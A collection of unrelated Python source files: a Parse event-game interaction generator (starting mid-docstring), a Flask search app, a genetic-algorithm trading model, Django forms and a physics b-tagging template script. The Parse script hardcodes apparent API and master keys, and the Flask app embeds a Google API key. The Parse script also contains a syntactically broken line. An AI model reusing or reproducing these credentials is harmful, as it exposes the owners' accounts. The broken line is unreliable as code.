- interaction (int from 1 to 2500)
- subround (int from 1 to 50)
- station (int from 1 to 50)
- iPad_objectId (a string? pointer?)
- m_objectId (a string? pointer?)
- f_objectId (a string? pointer?)
- m_playerNum (int)
- f_playerNum (int)
- m_firstName (string)
- f_firstName (string)
- question_objectId (a string? pointer?)
- m_answer (string? or int of array position 0-3? or array of [int, string]?)
- f_answer (string? or int of array position 0-3?)
- is_same_answer (boolean) (will be filled in by play_zE0001R1.py)
- m_see_f_again (string or int 1-4?)
- f_see_m_again (string or int 1-4?)
- total_see_again (int, sum of see again ints, so possible values are 2-8)
- m_next_station (int)
- f_next_station (int, current + 1)
- ACL (will work on this later)
I'm going to start by just using strings
to reference objectId's,
and I'll figure out later if it'll be
better or more helpful to use pointers.
I'm also going to try to use ParsePy,
which I *think* is meant to make it easier
to interact with Parse in Python.
Eventually, I can put the code in these files into functions,
and have a simulate_zE0001 function to simulate a game
being setup, played, an analyzed.
The ParsePy docs are at
https://github.com/dgrtwo/ParsePy.
**************************************************
Here's the order of everything:
1. Get (query) all "zE0001_User" objects (the people at the event)
- all_users_at_event is an array containing the objects
- create all_males_at_event, all_females_at_event too
- use ParsePy / parse_rest
- (should I use the Parse "count" function?)
- a Query returns a "QuerySet" of objects.
- QuerySets are like lists, but you can't operate on them:
(AttributeError: 'Queryset' object has no attribute 'insert'),
so I cast each QuerySet as a list.
- an object's attributes are accessed like this: > object.attribute
For example, to get the username of playerNum = 1: > all_users_at_event[0].username
2. Get (query) the correct iPads / "IPad" objects for the event (right now, get all 100)
- all_ipads_at_event is an array containing the objects
3. Get (query) the correct questions / "Question" objects for the event (right now, get all 100)
- all_questions_at_event is an array containing the objects
4. Create the interaction / zE####R1 objects, store them in an array,
create a ParseBatcher, and upload the objects by calling batch_save
on the batcher, passing the array as an argument.
- The Parse batch upload limit is 50, so this has to be
in some kind of loop.
- Use counters, formatted like: interaction_counter, subround_counter
**************************************************
"""
# import stuff
import math
import os
import random
import sqlite3
import time
import json, httplib, urllib # parse stuff
from pprint import pprint # pretty printing
from parse_rest.connection import ParseBatcher, register, SessionToken
from parse_rest.datatypes import ACL, Function, Object
from parse_rest.role import Role
from parse_rest.user import User
# start program timer
program_start_time = time.time()
# Calling "register" allows parse_rest / ParsePy to work.
# - register(APPLICATION_ID, REST_API_KEY, optional MASTER_KEY)
register("AKJFNWcTcG6MUeMt1DAsMxjwU62IJPJ8agbwJZDJ",
"i8o0t6wg9GOTly0yaApY2c1zZNMvOqNhoWNuzHUS",
master_key = "LbaxSV6u64DRUKxdtQphpYQ7kiaopBaRMY1PgCsv"
)
# get correct event object from Parse;
# have to subclass Object before using Event.Query
class Event(Object):
pass
event_object = list(Event.Query.get(eventNumber = 1))
# (do I need to make this a list?)
##################################################
""" _______________________________________________
1. Get (query) all "zE0001_User" objects (the people at the event)
- all_users_at_event is an array containing the objects
- create all_males_at_event, all_females_at_event too
- use ParsePy / parse_rest
- (should I use the Parse "count" function?)
- a Query returns a "QuerySet" of objects.
- QuerySets are like lists, but you can't operate on them:
(AttributeError: 'Queryset' object has no attribute 'insert'),
so I cast each QuerySet as a list.
- an object's attributes are accessed like this: > object.attribute
For example, to get the username of playerNum = 1: > all_users_at_event[0].username
_______________________________________________
----------------------------------------------- """
def get_eventUserClassName(event_number):
# Should I use a switch block instead? Can I with ranges?
# set the class name of the event users we're querying
num_string = ""
if 0 < event_number < 10:
num_string = "000{}".format(event_number)
elif 10 <= event_number < 100:
num_string = "00{}".format(event_number)
elif 100 <= event_number < 1000:
num_string = "0{}".format(event_number)
elif 1000 <= event_number < 10000:
num_string = "{}".format(event_number)
else:
raise ValueError("The event number must be between 1 and 9999.")
return "zE{}_User".format(num_string)
# set the class name of the event users we're querying
#eventUserClassName = "zE0001_User"
eventUserClassName = get_eventUserClassName(event_object.eventNumber)
# (The event number can be retrieved / set by querying "Config";
# I'll add this functionality later.)
# make it a subclass of Object
eventUserClass = Object.factory(eventUserClassName)
# Queries return with a format of [object, object, object, ...]
# and an object's attributes are accessed like this:
# object.attribute
# For example, to get the username of playerNum = 1:
# all_users_at_event[0].username
# run the query (all users at event)
all_users_at_event = list(eventUserClass.Query.all().order_by("playerNum"))
# run the query (all males at event)
all_males_at_event = list(eventUserClass.Query.all().filter(sex='M').order_by("playerNum"))
# run the query (all females at event)
all_females_at_event = list(eventUserClass.Query.all().filter(sex='F').order_by("playerNum"))
# run the query (all ghosts at event)
all_ghosts_at_event = list(eventUserClass.Query.all().filter(sex='G').order_by("playerNum"))
# print the results of the queries
print "\n\n{} of the {} people who registered for this event are here.\n".format(len(all_users_at_event), event_object.numPeople)
print "\n\n{} of the {} men are here.\n".format(len(all_males_at_event), event_object.numMen)
print "\n\n{} of the {} women are here.\n".format(len(all_females_at_event), event_object.numWomen)
print "\n\n{} \"ghosts\" are being provided.\n".format(len(all_ghosts_at_event))
print "\n\n{} iPads and {} iPad stations are required for this event.".format(event_object.numIPads, event_object.numStations)
""" _______________________________________________
2. Get (query) the correct iPads / "IPad" objects for the event (right now, get all 100)
- all_ipads_at_event is an array containing the objects
_______________________________________________
----------------------------------------------- """
# make IPad a subclass of Object
class IPad(Object):
pass
# run the query
all_ipads_at_event = list(IPad.Query.all().order_by("iPad_Id"))
""" _______________________________________________
3. Get (query) the correct questions / "Question" objects for the event (right now, get all 100)
- all_questions_at_event is an array containing the objects
_______________________________________________
----------------------------------------------- """
# make Question a subclass of Object
class Question(Object):
pass
# run the query
all_questions_at_event = list(Question.Query.all().order_by("questionNum"))
""" _______________________________________________
4. Create the interaction / zE####R1 objects, store them in an array,
create a ParseBatcher, and upload the objects by calling batch_save
on the batcher, passing the array as an argument.
- The Parse batch upload limit is 50, so this has to be
in some kind of loop.
- Use counters.
_______________________________________________
----------------------------------------------- """
# set the class name of the round for which we're creating interactions (zE####R1)
eventRoundClassName = eventUserClassName[:6] + "R1"
# make it a subclass of Object
eventRoundClass = Object.factory(eventRoundClassName)
# # set the class's ACL - doesn't work right now
# zE0001R1.ACL.set_default(read = False, write = False)
# initiate counters
interaction_counter = 0
# initialize the list of stations [1, 2, 3, ..., 50]
station_list = list(x+1 for x in range(50))
batch_uploading_start_time = time.time()
# iterate through the subrounds -- i.e. subround 1 contains interactions 1-50, etc.
for subround in range (50):
# initialize the list of created objects to pass to the batch uploader
interactions_list_to_be_saved = []
# create the 50 interactions of this subround
for i in range (50):
interaction_counter += 1
interaction = eventRoundClass(
interaction = interaction_counter,
subround = subround + 1,
station = station_list[i],
inner_iPad_objectId = all_ipads_at_event[i].objectId,
outer_iPad_objectId = all_ipads_at_event[i+50].objectId,
m_thisEvent_objectId = all_males_at_event[i].objectId,
f_thisEvent_objectId = all_females_at_event[i].objectId,
m_user_objectId = all_males_at_event[i].user_objectId,
f_user_objectId = all_females_at_event[i].user_objectId,
m_playerNum = all_males_at_event[i].playerNum,
f_playerNum = all_females_at_event[i].playerNum,
m_firstName = all_males_at_event[i].username,
f_firstName = all_females_at_event[i].username,
question_objectId = all_questions_at_event[i].objectId,
# m_answer = None,
# f_answer = None,
# is_same_answer = None,
# m_see_f_again = None,
# f_see_m_again = None,
# total_see_again = None,
m_next_station = ( (station_list[i] + 1) % 50 if station_list[i] != ),
f_next_station = ( (station_list[i] - 1) if station_list[i] > 1 else 50 )
)
# add to interactions_list_to_be_saved
interactions_list_to_be_saved.append(interaction)
# wait approx. 1-2 seconds so as not to exceed Parse's 30 requests / second free limit.
# Without waiting, I get this error:
# parse_rest.core.ResourceRequestBadRequest: {"code":155,"error":"This application performed 1805 requests within the past minute, and exceeded its request limit. Please retry in one minute or raise your request limit."}
# Times that work: 2.0
# Times that don't work: 0.5 (does 35 of 50), 1.0 (does 47 of 50)
#time.sleep(1)
# if we're going too fast for the request limit of 1800 per minute, slow down
# Test 1: Slept after batch 35 for 47.557 seconds. Success (no errors, all batches saved).
# Test 2: Slept after batch 35 for 49.203 seconds. Success.
# Test 3: Slept after batch 35 for 45.496 seconds. Success.
time_uploading_before_sleep = time.time() - batch_uploading_start_time
if (time_uploading_before_sleep < 60) and (interaction_counter > 1799):
print "\nSleeping for {} seconds.".format(round((60 - time_uploading_before_sleep), 3))
pause_time = time.time()
time.sleep(60 - time_uploading_before_sleep)
print "\nUploading will now resume.\n"
resume_time = time.time()
# save these 50 interactions to Parse
batcher = ParseBatcher()
batcher.batch_save(interactions_list_to_be_saved)
print "batch " + str(subround + 1) + " of 50 has been saved."
# rotate lists
# (I'm getting an error that says "Slice is not supported for now.",
# so I've had to do something slightly more complicated.)
# males: take the last, put in front
# (guys are moving toward increasing station nums)
all_males_at_event.insert(0, all_males_at_event[-1])
all_males_at_event.pop(-1) # default is -1, but I left it in for clarity
# females: take the first, put in back
# (girls are moving toward decreasing station nums)
all_females_at_event.append(all_females_at_event[0])
all_females_at_event.pop(0)
# iPads: will iterate as stations do
# (an iPad always stays at the same station)
# questions: take the first two, put in back
all_questions_at_event.append(all_questions_at_event[0])
all_questions_at_event.append(all_questions_at_event[1])
all_questions_at_event.pop(0)
all_questions_at_event.pop(0)
# rotate lists (with slicing)
# (ParsePy doesn't support slicing lists of objects yet)
# # males: take the first, put in back
# all_males_at_event = all_males_at_event[1:] + [all_males_at_event[0]]
# # females: take the last, put in front
# all_females_at_event = [all_females_at_event[-1]] + all_females_at_event[:-1]
# # questions: take the first two, put in back
# all_questions_at_event = all_questions_at_event[2:] + all_questions_at_event[:2]
program_end_time = time.time()
print "\nAll batches saved."
# Timing tests
print "\nTime spent uploading: {} seconds.".format(round((pause_time - program_start_time) + (program_end_time - resume_time), 3))
print "\nTime spent sleeping: {} seconds.".format(round((resume_time - pause_time), 3))
print "\nTotal time of program: {} seconds.\n".format(round((program_end_time - program_start_time), 3))
"""
TESTS
******
From laptop, at home:
Time spent uploading: 19.552 seconds.
Time spent sleeping: 48.067 seconds.
Total time of program: 67.618 seconds.
Time spent uploading: 18.309 seconds.
Time spent sleeping: 47.767 seconds.
Total time of program: 66.076 seconds.
Time spent uploading: 19.194 seconds.
Time spent sleeping: 47.814 seconds.
Total time of program: 67.008 seconds.
******
From laptop, at Dana Farber:
Time spent uploading: 32.592 seconds.
Time spent sleeping: 38.232 seconds.
Total time of program: 70.824 seconds.
"""
|
993,453 | 19f5243ff43c20beed65a4c11871c6f7d8500185 | from flask import Flask, request, render_template
import requests
import json
app = Flask(__name__)
app.debug = True
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/search_form')
def search_form():
return render_template("search_form.html")
@app.route('/search_info')
def view_search_info():
data = request.args
term = data.get('term')
base_url = "https://www.googleapis.com/customsearch/v1?key=AIzaSyAZIzd9d4j2uBEqkNgM5a7LSmShu1dOc8A&cx=017576662512468239146:omuauf_lfve&q=" + term
params = {}
params["term"] = term
resp = requests.get(base_url, params=params)
data_text = resp.text
python_obj = json.loads(data_text)
print(python_obj)
return render_template("search_results.html", object=python_obj['searchInformation'], term=term)
if __name__ == '__main__':
app.run() |
993,454 | dfddd7f26d630601cab680f54089ce7a36ec4484 | # stuff for managing the "tmp" temporary directory
import os
import shutil
def reset():
if os.path.exists('tmp'):
shutil.rmtree('tmp')
os.makedirs('tmp')
|
993,455 | cc3d34596a5a32e60fa32b406d82b7b406d37833 | from typing import Optional, List, Tuple, IO
import numpy as np
import pickle
class TradingPopulation:
def __init__(self, input_shape: Tuple[int, int], starting_balance: float, num_individuals: int,
mutation_chance_genome=.1, mutation_magnitude=.15, crossover_chance_genome=.5):
self.__num_individuals = num_individuals
self.__best_individual: Optional[TradingIndividual] = None
self.__contained_individuals: List[TradingIndividual] = []
self.__input_shape = input_shape
self.__starting_balance = starting_balance
self.__mutation_chance = mutation_chance_genome
self.__mutation_magnitude = mutation_magnitude
self.__crossover_chance = crossover_chance_genome
def save(self, file_name: str):
with open(file_name, 'wb') as open_handle:
open_handle.write(str(self.__num_individuals).encode(encoding="UTF8") + b'\n')
pickle.dump(self.__input_shape, open_handle)
for individual in self.__contained_individuals:
individual.save(open_handle)
def load(self, file_name: str):
with open(file_name, 'rb') as open_handle:
self.__contained_individuals = []
num_individuals = int(open_handle.readline())
self.__num_individuals = num_individuals
self.__input_shape = pickle.load(open_handle)
for i in range(num_individuals):
self.__contained_individuals.append(TradingIndividual((1, 1), 0))
self.__contained_individuals[-1].load(open_handle)
def train(self, input_data: np.ndarray, epochs: int, share_prices: List[float]) -> List[float]:
# note that input_data in this context is a Kxmxn matrix. Where K is the number of examples in the dataset for
# one stock. It is also assumed that the each mxn matrix is sequentially in order.
# Meaning that the example paired with July 14 is after the one for July 13, and before the one for July 15.
if len(self.__contained_individuals) == 0:
self.__spawn_remaining_population()
best_fitness = []
for i in range(epochs):
for j in range(len(input_data)):
example_data = input_data[j]
share_price = share_prices[j]
self.__epoch_iteration(example_data, share_price)
best_fitness = self.__generate_next_generation()
return best_fitness
def predict(self, input_data: np.ndarray) -> np.ndarray:
ret_predictions = np.zeros((3, 2))
for i in range(3):
ret_predictions[i] = self.__contained_individuals[i].predict_data(input_data)
return ret_predictions
def __epoch_iteration(self, input_data: np.ndarray, share_price: float):
for individual in self.__contained_individuals:
individual.handle_data(input_data, share_price)
def __generate_next_generation(self):
self.__contained_individuals = sorted(self.__contained_individuals,
key=lambda x: x.calculate_fitness(),
reverse=True)
mutate_pop: List[TradingIndividual] = []
crossover_pop: List[TradingIndividual] = []
kept_pop = self.__contained_individuals[:round(.1 * self.__num_individuals)]
best_fitness = [x.calculate_fitness() for x in kept_pop[:3]]
for individual in kept_pop:
individual.reset_starting_state()
for i in range(round(.3 * self.__num_individuals)):
selected_individual = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
mutate_pop.append(selected_individual.mutate(self.__mutation_chance, self.__mutation_magnitude))
for i in range(round(.2 * self.__num_individuals)):
selected_individual_a = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
selected_individual_b = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
while selected_individual_a == selected_individual_b:
selected_individual_b = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
crossover_pop.append(selected_individual_a.crossover(selected_individual_b, self.__crossover_chance))
kept_pop.extend(mutate_pop)
kept_pop.extend(crossover_pop)
self.__contained_individuals = kept_pop
self.__spawn_remaining_population()
return best_fitness
def __spawn_remaining_population(self):
for i in range(self.__num_individuals - len(self.__contained_individuals)):
self.__contained_individuals.append(TradingIndividual(self.__input_shape, self.__starting_balance))
class TradingIndividual:
def __init__(self, input_shape: Tuple[int, int], starting_balance: float):
self.__days_share_held = 0
self.__current_balance = starting_balance
self.__starting_balance = starting_balance
self.__transaction_state = False
self.__held_share_price = 0.0
self.__num_held_shares = 0
self.__buy_state_matrices: List[np.ndarray] = []
self.__sell_state_matrices: List[np.ndarray] = []
self.__initialize_transaction_matrices(input_shape)
self.__input_shape = input_shape
def __initialize_transaction_matrices(self, input_shape: Tuple[int, int]):
# Initialize transaction matrices with values in the range [-2, 2)
# With this range, values should neither explode nor degrade during multiplications too badly.
def shift_matrix_factory(shape):
return np.full(shape, 2)
self.__buy_state_matrices.clear()
self.__sell_state_matrices.clear()
reframe_shape = (input_shape[1], input_shape[0])
analysis_shape = (input_shape[0], input_shape[0])
weighing_shape = (input_shape[0], 2)
conclusory_shape = (1, input_shape[0])
self.__buy_state_matrices.append((np.random.ranf(reframe_shape) * 4) - shift_matrix_factory(reframe_shape))
self.__buy_state_matrices.append((np.random.ranf(analysis_shape) * 4) - shift_matrix_factory(analysis_shape))
self.__buy_state_matrices.append((np.random.ranf(weighing_shape) * 4) - shift_matrix_factory(weighing_shape))
self.__buy_state_matrices.append(
(np.random.ranf(conclusory_shape) * 4) - shift_matrix_factory(conclusory_shape))
self.__sell_state_matrices.append((np.random.ranf(reframe_shape) * 4) - shift_matrix_factory(reframe_shape))
self.__sell_state_matrices.append((np.random.ranf(analysis_shape) * 4) - shift_matrix_factory(analysis_shape))
self.__sell_state_matrices.append((np.random.ranf(weighing_shape) * 4) - shift_matrix_factory(weighing_shape))
self.__sell_state_matrices.append(
(np.random.ranf(conclusory_shape) * 4) - shift_matrix_factory(conclusory_shape))
def __mutate_matrix(self, chance_per_genome: float, rate_per_selected: float, matrix: np.ndarray) -> np.ndarray:
# The current decision is to base the mutation of each genome on the current strength of the genome.
# This may prevent explosion of values and will be more precise at lower magnitude numbers.
# This comes at the cost of a loss of precise mutations with higher magnitude numbers.
# The other option is to set the maximum magnitude of mutation, and have the rate be a multiplier on that.
ret_matrix = np.zeros_like(matrix)
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
genome_chance = np.random.ranf()
if genome_chance < chance_per_genome:
genome_chance = np.random.ranf()
mutation_magnitude = matrix[i][j] * rate_per_selected
if genome_chance < .5:
mutation_magnitude *= -1
ret_matrix[i][j] = matrix[i][j] + mutation_magnitude
return ret_matrix
def __crossover_matrix(self,
matrix_a: np.ndarray,
matrix_b: np.ndarray,
chance_per_genome: float
) -> np.ndarray:
ret_matrix = np.zeros_like(matrix_a)
for i in range(matrix_a.shape[0]):
for j in range(matrix_a.shape[1]):
genome_chance = np.random.ranf()
if genome_chance < chance_per_genome:
ret_matrix[i][j] = matrix_a[i][j]
else:
ret_matrix[i][j] = matrix_b[i][j]
return ret_matrix
def mutate(self, chance_per_genome: float, rate_per_selected: float) -> "TradingIndividual":
ret_individual = TradingIndividual(self.__input_shape, self.__starting_balance)
for i in range(len(self.__buy_state_matrices)):
matrix = self.__buy_state_matrices[i]
ret_individual.__buy_state_matrices[i] = self.__mutate_matrix(chance_per_genome, rate_per_selected, matrix)
matrix = self.__sell_state_matrices[i]
ret_individual.__sell_state_matrices[i] = self.__mutate_matrix(chance_per_genome, rate_per_selected, matrix)
return ret_individual
def reset_starting_state(self):
self.__current_balance = self.__starting_balance
self.__transaction_state = False
self.__held_share_price = 0.0
self.__num_held_shares = 0
def crossover(self, other: "TradingIndividual", crossover_chance=.5) -> "TradingIndividual":
ret_individual = TradingIndividual(self.__input_shape, self.__starting_balance)
for i in range(len(self.__buy_state_matrices)):
matrix_a = self.__buy_state_matrices[i]
matrix_b = other.__buy_state_matrices[i]
ret_individual.__buy_state_matrices[i] = self.__crossover_matrix(matrix_a, matrix_b, crossover_chance)
matrix_a = self.__sell_state_matrices[i]
matrix_b = other.__sell_state_matrices[i]
ret_individual.__sell_state_matrices[i] = self.__crossover_matrix(matrix_a, matrix_b, crossover_chance)
return ret_individual
def calculate_fitness(self):
return self.__current_balance - self.__starting_balance
def __evaluate_transaction(self,
input_data: np.ndarray, state_matrices: List[np.ndarray]
) -> np.ndarray:
evaluation_ret = input_data
for i in range(len(state_matrices) - 1):
evaluation_ret = evaluation_ret @ state_matrices[i]
return state_matrices[-1] @ evaluation_ret
def handle_data(self, input_data: np.ndarray, share_price: float):
if self.__transaction_state:
evaluation_result = self.__evaluate_transaction(input_data, self.__sell_state_matrices)
if evaluation_result[0][0] > evaluation_result[0][1] or self.__days_share_held == 5:
# Indicates we should sell current held shares
self.__current_balance += self.__num_held_shares * share_price
self.__num_held_shares = 0
self.__held_share_price = 0
self.__transaction_state = False
self.__days_share_held = 0
else:
self.__days_share_held += 1
else:
evaluation_result = self.__evaluate_transaction(input_data, self.__buy_state_matrices)
if evaluation_result[0][0] > evaluation_result[0][1]:
# Indicates we should buy some shares
self.__num_held_shares = 100
self.__current_balance -= self.__num_held_shares * share_price
self.__held_share_price = share_price
self.__transaction_state = True
def predict_data(self, input_data: np.ndarray) -> np.ndarray:
buy_evaluation_result = self.__evaluate_transaction(input_data, self.__buy_state_matrices)
sell_evaluation_result = self.__evaluate_transaction(input_data, self.__sell_state_matrices)
return np.array([
buy_evaluation_result[0][0] > buy_evaluation_result[0][1],
sell_evaluation_result[0][0] > sell_evaluation_result[0][1]
])
def load(self, file_handle: IO):
for i in range(len(self.__buy_state_matrices)):
self.__buy_state_matrices[i] = pickle.load(file_handle)
for i in range(len(self.__sell_state_matrices)):
self.__sell_state_matrices[i] = pickle.load(file_handle)
self.__starting_balance = pickle.load(file_handle)
def save(self, file_handle: IO):
for mat in self.__buy_state_matrices:
pickle.dump(mat, file_handle)
for mat in self.__sell_state_matrices:
pickle.dump(mat, file_handle)
pickle.dump(self.__starting_balance, file_handle)
|
993,456 | 8a2db74aa39746e27fca5a8c0ccd7166b9a59135 | from django import forms
from users_profiles.models import UserProfile
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ('receive_news', 'picture')
#todo how to change user category from player to developer and viceverca
#todo how to determine the category of the user created in 3d party login process
class ShortUserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ('category',)
class UserProfileForm2(forms.ModelForm):
#password = forms.CharField(widget=forms.PasswordInput())
#category = forms.ChoiceField(choices=(("Developer", "Developer"),("Gamer", "Gamer")))
class Meta:
model = User
fields = ( 'first_name', 'last_name', 'email',) |
993,457 | f7ba58797dab809843107b81c4cfbb9a117508b8 | # coding: utf-8
from __future__ import absolute_import
# import models into model package
from .ane import ANE
from .ane_flow_coefficient import ANEFlowCoefficient
from .error import Error
from .error_meta import ErrorMeta
from .flow_spec import FlowSpec
from .path_query_response import PathQueryResponse
from .query_desc import QueryDesc
from .resource_query_response import ResourceQueryResponse
|
993,458 | be4cf1a3d70e3e692b2daaa186ce64e21cf69f1f | #!/usr/bin/env python
import os
value=os.system("ipython notebook --pylab inline")
if value>0:
value=os.system("ipython notebook --pylab inline --port 9999")
|
993,459 | 56a03e302f1f9d27551000325decd497ec22cea9 | def cigar_party(cigars, is_weekend):
if (cigars >= 40 and cigars <= 60) and not is_weekend:
return True
if (cigars >= 40 and cigars <= 60) and is_weekend:
return True
if (cigars > 60) and is_weekend:
return True
if (cigars < 40 or cigars > 60) and is_weekend:
return False
return False
|
993,460 | 2098f551db4a95ab1f90a16c9bd5bcee1ee19b13 | import optparse
import os,sys
import json
import commands
import ROOT
import pickle
from plotter import Plot
CHANNELS = [-11*11,-13*13,-11*13]
#CHANNELS = [-11*13]
JETMULTCATEGS = [2,3,4]
SLICEBINS = [(20,320),(20,60),(60,120),(120,320)]
SLICEVAR = 'jetpt'
SYSTVARS = ['','jesup','jesdn','jerup','jerdn','trigdn','trigup','seldn','selup','qcdscaledn','qcdscaleup','hdampdn','hdampup']
"""
Project trees from files to build the templates
"""
def prepareTemplates(tagger,taggerDef,inDir,outDir):
print '...starting %s'%tagger
histos={}
nOPs=len(taggerDef)-2
nSliceCategs=(len(SLICEBINS)-1)**2+1
#MC efficiency
for key in ['b','c','l']:
for i in xrange(1,nOPs+1):
name='%s_%s_pass%d'%(key,tagger,i-1)
histos[name]=ROOT.TH1F(name,';%s slice bin;Events'%SLICEVAR,len(SLICEBINS),0,len(SLICEBINS))
for xbin in xrange(0,len(SLICEBINS)):
label='%d-%d'%(SLICEBINS[xbin][0],SLICEBINS[xbin][1])
histos[name].GetXaxis().SetBinLabel(xbin+1,label)
#flavour categories
flavourCombinationsBinMap=['l_{1}l_{2}','l_{1}c_{2}','l_{1}b_{2}','c_{1}l_{2}','c_{1}c_{2}','c_{1}b_{2}','b_{1}l_{2}','b_{1}c_{2}','b_{1}b_{2}']
jetCategsBinMap=[]
j1slice,j2slice=1,1
for islice in xrange(0,nSliceCategs):
j1Cuts,j2Cuts=SLICEBINS[0],SLICEBINS[0]
if islice>0:
if j2slice==len(SLICEBINS):
j2slice=1
j1slice+=1
j1Cuts,j2Cuts=SLICEBINS[j1slice],SLICEBINS[j2slice]
j2slice+=1
if j1Cuts[0]<j2Cuts[0]:continue
jetCategsBinMap.append( (j1Cuts,j2Cuts) )
histos['flavcategs']=ROOT.TH2F('flavcategs',';Slice category;Flavour combination',
len(jetCategsBinMap),0,len(jetCategsBinMap),9,0,9)
for xbin in xrange(0,len(jetCategsBinMap)):
j1Cuts,j2Cuts=jetCategsBinMap[xbin][0],jetCategsBinMap[xbin][1]
label='(%d-%d),(%d-%d)'%(j1Cuts[0],j1Cuts[1],j2Cuts[0],j2Cuts[1])
histos['flavcategs'].GetXaxis().SetBinLabel(xbin+1,label)
for ybin in xrange(0,len(flavourCombinationsBinMap)):
histos['flavcategs'].GetYaxis().SetBinLabel(ybin+1,flavourCombinationsBinMap[ybin])
#tag counting in categories
tagCountingBinMap=[]
nJetMultCategs=len(JETMULTCATEGS)
j1slice,j2slice=1,1
for islice in xrange(0,nSliceCategs):
j1Cuts,j2Cuts=SLICEBINS[0],SLICEBINS[0]
if islice>0:
if j2slice==len(SLICEBINS):
j2slice=1
j1slice+=1
j1Cuts,j2Cuts=SLICEBINS[j1slice],SLICEBINS[j2slice]
j2slice+=1
if j1Cuts[0]<j2Cuts[0]:continue
for ij in xrange(0,nJetMultCategs):
jmult=JETMULTCATEGS[ij]
for bmult in xrange(0,3):
tagCountingBinMap.append( (bmult,jmult,j1Cuts,j2Cuts) )
print len(tagCountingBinMap),' bins for tag counting...have fun with that'
for key in ['data','hh','hl','ll']:
for i in xrange(1,nOPs):
name='%s_%s_pass%d'%(key,tagger,i)
histos[name]=ROOT.TH1F(name,';%s b-tag multiplicity;Events'%taggerDef[0],len(tagCountingBinMap),0,len(tagCountingBinMap))
curJetMult=tagCountingBinMap[0][1]
curJ1Cut=tagCountingBinMap[0][2]
curJ2Cut=tagCountingBinMap[0][3]
for xbin in xrange(1,len(tagCountingBinMap)+1):
bmult=tagCountingBinMap[xbin-1][0]
jmult=tagCountingBinMap[xbin-1][1]
j1cut=tagCountingBinMap[xbin-1][2]
j2cut=tagCountingBinMap[xbin-1][3]
printJetMult=False
if xbin==1 or jmult!=curJetMult:
printJetMult=True
curJetMult=jmult
printJetCuts=False
if xbin==1 or j1cut!=curJ1Cut or j2cut!=curJ2Cut:
printJetCuts=True
curJ1Cut=j1cut
curJ2Cut=j2cut
label='%dt'%bmult
if printJetMult : label += ',%dj'%jmult
if printJetCuts : label='#splitline{%s}{(%d-%d),(%d-%d)}'%(label,j1cut[0],j1cut[1],j2cut[0],j2cut[1])
histos[name].GetXaxis().SetBinLabel(xbin,label)
#add files to the corresponding chains
files = [ f for f in os.listdir(inDir) if '.root' in f ]
chains={'mc':ROOT.TChain('ftm'),'data':ROOT.TChain('ftm')}
for f in files:
key = 'mc' if 'MC' in f else 'data'
chains[key].Add(inDir+'/'+f)
#fill histos
for key in chains:
totalEntries=chains[key].GetEntries()
for i in xrange(0,totalEntries):
if i%100==0 : sys.stdout.write('\r [ %d/100 ] done for %s' %(int(float(100.*i)/float(totalEntries)),key) )
chains[key].GetEntry(i)
#require matching channel
if not chains[key].ttbar_chan in CHANNELS : continue
#require at least two jets
if not chains[key].jetmult in JETMULTCATEGS : continue
#event weight
weight=chains[key].weight[0]
ntags=[0]*nOPs
nheavy=0
flavourCombLabel=''
for ij in xrange(0,2):
#tagger value
taggerVal = getattr(chains[key],tagger)[ij]
#count tags
passTagWgts=[False]*nOPs
for iop in xrange(1,nOPs):
if taggerVal<taggerDef[iop+1]: continue
passTagWgts[iop-1]=True
ntags[iop-1]+=1
#MC truth
flavName='l'
if abs(chains[key].flavour[ij])==5 :
nheavy +=1
flavName='b'
if abs(chains[key].flavour[ij])==4:
nheavy+=1
flavName='c'
#MC truth for the efficiency as function of the slicing variable
flavourCombLabel += '%s_{%d}'%(flavName,ij+1)
jetSliceVarVal=getattr(chains[key],SLICEVAR)[ij]
for ijcat in xrange(0,len(SLICEBINS)):
if jetSliceVarVal<SLICEBINS[ijcat][0] : continue
if jetSliceVarVal>SLICEBINS[ijcat][1] : continue
histos['%s_%s_pass0'%(flavName,tagger)].Fill(ijcat,weight)
for iop in xrange(1,nOPs):
if not passTagWgts[iop-1] : continue
name='%s_%s_pass%d'%(flavName,tagger,iop)
histos[name].Fill(ijcat,weight)
#MC truth for the jet flavour combination vs jet slicing category
if key !='data':
for iflavComb in xrange(0,len(flavourCombinationsBinMap)):
if flavourCombLabel!= flavourCombinationsBinMap[iflavComb] : continue
for ijetCateg in xrange(0,len(jetCategsBinMap)):
j1Cuts=jetCategsBinMap[ijetCateg][0]
j1SliceVarVal=getattr(chains[key],SLICEVAR)[0]
if j1SliceVarVal<j1Cuts[0] or j1SliceVarVal>j1Cuts[1] : continue
j2Cuts=jetCategsBinMap[ijetCateg][1]
j2SliceVarVal=getattr(chains[key],SLICEVAR)[1]
if j2SliceVarVal<j2Cuts[0] or j2SliceVarVal>j2Cuts[1] : continue
histos['flavcategs'].Fill(ijetCateg,iflavComb,weight)
#tag counting histograms
flavCat=key
if key != 'data' :
flavCat='hh'
if nheavy==1: flavCat='hl'
if nheavy==0: flavCat='ll'
for ibin in xrange(0,len(tagCountingBinMap)):
if chains[key].jetmult != tagCountingBinMap[ibin][1] : continue
j1Cuts=tagCountingBinMap[ibin][2]
j1SliceVarVal=getattr(chains[key],SLICEVAR)[0]
if j1SliceVarVal<j1Cuts[0] or j1SliceVarVal>j1Cuts[1] : continue
j2Cuts=tagCountingBinMap[ibin][3]
j2SliceVarVal=getattr(chains[key],SLICEVAR)[1]
if j2SliceVarVal<j2Cuts[0] or j2SliceVarVal>j2Cuts[1] : continue
for iop in xrange(1,nOPs):
if ntags[iop-1]!=tagCountingBinMap[ibin][0] : continue
name='%s_%s_pass%d'%(flavCat,tagger,iop)
histos[name].Fill(ibin,weight)
#save templates to file
fOut=ROOT.TFile.Open('%s/FtM/%s.root'%(outDir,tagger),'RECREATE')
for key in histos : histos[key].Write()
fOut.Close()
"""
Wrapper to be used when run in parallel
"""
def runPrepareTemplatesPacked(args):
tagger, taggerDef, inDir, outDir = args
try:
return prepareTemplates(tagger=tagger,
taggerDef=taggerDef,
inDir=inDir,
outDir=outDir)
except :
print 50*'<'
print " Problem found (%s) baling out of this task" % sys.exc_info()[1]
print 50*'<'
